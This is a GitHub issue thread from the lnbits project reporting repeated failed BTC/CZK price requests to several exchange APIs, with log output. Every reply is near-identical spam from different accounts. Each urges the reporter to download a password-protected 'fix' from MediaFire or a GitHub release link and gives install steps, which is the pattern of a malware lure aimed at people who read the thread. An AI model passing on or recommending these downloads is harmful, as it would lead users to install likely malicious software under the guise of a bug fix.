### ISSUE TITLE
[BUG] Constant request of exchange rate pairs where they are not in the API

### ISSUE THREAD

**Issue by Perlover** [lnbits/lnbits#2600]
**Describe the bug**

Three exchange rate providers don't have the right pairing (BTC/CZK).

Should this be considered a bug?

It seems to me that it would be possible to improve the list of exchange rate providers, or not to request a pair where it is definitely not present (I think this could be the reason for banning the LNBits IP server from exchange rate providers).

**Desktop (please complete the following information):**

- LNbits version: 0.12.10
- Database Sqlite

**Additional context**

```
Jul 24 14:11:15 host poetry[767104]: 2024-07-24 14:11:15.19 | WARNING | Failed to fetch Bitcoin price for CZK from Bitstamp: Client error '404 Not Found' for url 'https://www.bitstamp.net/api/v2/ticker/btcczk/'
Jul 24 14:11:15 host poetry[767104]: For more information check: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/404
Jul 24 14:11:15 host poetry[767104]: 2024-07-24 14:11:15.21 | WARNING | Failed to fetch Bitcoin price for CZK from Bitfinex: Client error '400 Bad Request' for url 'https://api.bitfinex.com/v1/pubticker/btcczk'
Jul 24 14:11:15 host poetry[767104]: For more information check: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/400
Jul 24 14:11:15 host poetry[767104]: 2024-07-24 14:11:15.22 | WARNING | Failed to fetch Bitcoin price for CZK from Kraken: 'result'
Jul 24 14:11:15 host poetry[767104]: 2024-07-24 14:11:15.25 | WARNING | Failed to fetch Bitcoin price for CZK from Binance: Client error '400 Bad Request' for url 'https://api.binance.com/api/v3/ticker/price?symbol=BTCCZK'
Jul 24 14:11:15 host poetry[767104]: For more information check: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/400
Jul 24 14:11:15 host poetry[767104]: 2024-07-24 14:11:15.43 | WARNING | Failed to fetch Bitcoin price for CZK from Exir:
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
